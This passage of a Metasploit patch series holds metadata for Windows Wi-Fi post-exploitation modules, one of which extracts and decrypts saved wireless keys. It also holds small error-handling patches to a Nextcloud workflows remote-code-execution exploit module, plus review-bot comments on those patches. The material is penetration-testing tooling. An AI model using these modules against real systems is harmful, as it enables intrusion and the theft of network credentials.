Merino " + ], + "description": "This module send probe requests through the wlan interface.\n The ESSID field will be use to set a custom message.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/wlan/wlan_probe_request.rb", + "is_install_path": true, + "ref_name": "windows/wlan/wlan_probe_request", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/wlan/wlan_profile": { + "name": "Windows Gather Wireless Profile", + "fullname": "post/windows/wlan/wlan_profile", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts saved Wireless LAN profiles. It will also try to decrypt\n the network key material. Behavior is slightly different between OS versions\n when it comes to WPA. In Windows Vista/7 we will get the passphrase. In\n Windows XP we will get the PBKDF2 derived key.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/wlan/wlan_profile.rb", + "is_install_path": true, + "ref_name": "windows/wlan/wlan_profile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + } +} \ No newline at end of file From 2259de33c169969116bd287273aa6694cf54f840 Mon Sep 17 00:00:00 2001 
From: whotwagner Date: Wed, 14 May 2025 13:40:47 +0000 Subject: [PATCH 22/27] Fixed a txpo in nextcloud_workflows_rce.md --- .../modules/exploit/unix/webapp/nextcloud_workflows_rce.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md index 6beb988b28bff..66be630c29823 100644 --- a/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md +++ b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md @@ -76,7 +76,7 @@ Before we can run the exploit, we need to start the cronjob. This is crucial bec payload doesn't get triggered: ``` -docker exec -it -u www-data nextcloud-app-1 /bin/bash` +docker exec -it -u www-data nextcloud-app-1 /bin/bash watch -n2 php cron.php ``` From 0e0b84d2524fadd67d185dc48b255f4885e241e4 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Wed, 14 May 2025 13:53:59 +0000 Subject: [PATCH 23/27] Error message if nextcloud-upload fails --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 6569f8f4a42fb..c8b12d74fb36e 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -146,11 +146,12 @@ def create_workflow(operation) end def upload_file(filename) - send_request_cgi( + res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, "remote.php/webdav/#(unknown)"), 'method' => 'PUT', 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'text/plain ' } ) + fail_with(Failure::UnexpectedReply, 'Unable to upload file') unless res.message == 'Created' end def delete_workflow(workflow_id) From 9b619cbc58d9b3392284dd2461f2c9cc1de000c4 Mon Sep 17 00:00:00 2001 
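Review bot: The new guard in `upload_file` keys on the HTTP reason phrase, `res.message == 'Created'`, rather than on the status code; reason phrases are free-form, may be rewritten by a reverse proxy and are absent on HTTP/2, so a successful PUT can still trip the failure path. Comparing the status is the robust form, and the safe-navigation operator covers a nil response when the request itself fails: `fail_with(Failure::UnexpectedReply, 'Unable to upload file') unless res&.code == 201`. The same reason-phrase comparison is carried forward unchanged by the patch 26 hunk (`res&.message == 'Created'`), which only adds the nil guard. `upload_file` is fully visible in this hunk.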
From: whotwagner Date: Thu, 15 May 2025 11:12:05 +0200 Subject: [PATCH 24/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index c8b12d74fb36e..dd53e6c5b6f1d 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -86,7 +86,7 @@ def authenticate(user, pass) 'method' => 'GET', 'keep_cookies' => true ) - +fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200 @token = parse_token(res) fail_with(Failure::UnexpectedReply, 'Request Token not found') if @token.nil? From 72c9d5b038069ab7a85901ff0ee58926fa00c0b2 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Thu, 15 May 2025 11:14:25 +0200 Subject: [PATCH 25/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index dd53e6c5b6f1d..ee49ddcfb65a8 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -108,7 +108,7 @@ def request_token 'method' => 'GET', 'keep_cookies' => true ) - +fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200 @token = res.get_json_document['token'] fail_with(Failure::UnexpectedReply, '2: Request Token not found') if @token.nil? end From 61dc956bb3b28febb063d68af330a0566a2440c0 Mon Sep 17 00:00:00 2001 
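Review bot: The guard added in `request_token` reuses the wording from `authenticate`, `'Getting login page failed'`, but this response is the one read two lines later with `res.get_json_document['token']`, so a non-200 here is not a login-page failure and the message will send whoever reads the module output to the wrong request. Name the request that actually failed: `fail_with(Failure::UnexpectedReply, 'Getting request token failed') if res&.code != 200`. The neighbouring `'2: Request Token not found'` on the next context line looks like it carries a numeric debugging prefix that was never removed; if so it should be dropped in the same pass. `request_token` begins outside the hunk.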
From: whotwagner Date: Thu, 15 May 2025 11:15:05 +0200 Subject: [PATCH 26/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index ee49ddcfb65a8..e926ad675f6c9 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -151,7 +151,7 @@ def upload_file(filename) 'method' => 'PUT', 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'text/plain ' } ) - fail_with(Failure::UnexpectedReply, 'Unable to upload file') unless res.message == 'Created' + fail_with(Failure::UnexpectedReply, 'Unable to upload file') unless res&.message == 'Created' end def delete_workflow(workflow_id) From 97ecaa7c309ae1cb8ee60c48966dd805beb3b215 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Thu, 15 May 2025 09:16:26 +0000 Subject: [PATCH 27/27] Refactoring indentations --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index e926ad675f6c9..ac96580ed0aa1 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -86,7 +86,7 @@ def authenticate(user, pass) 'method' => 'GET', 'keep_cookies' => true ) -fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200 + fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200 @token = parse_token(res) fail_with(Failure::UnexpectedReply, 'Request Token not found') if @token.nil? 
@@ -108,7 +108,7 @@ def request_token
 'method' => 'GET',
 'keep_cookies' => true
 )
-fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200
+ fail_with(Failure::UnexpectedReply, 'Getting login page failed') if res&.code != 200
 @token = res.get_json_document['token']
 fail_with(Failure::UnexpectedReply, '2: Request Token not found') if @token.nil?
 end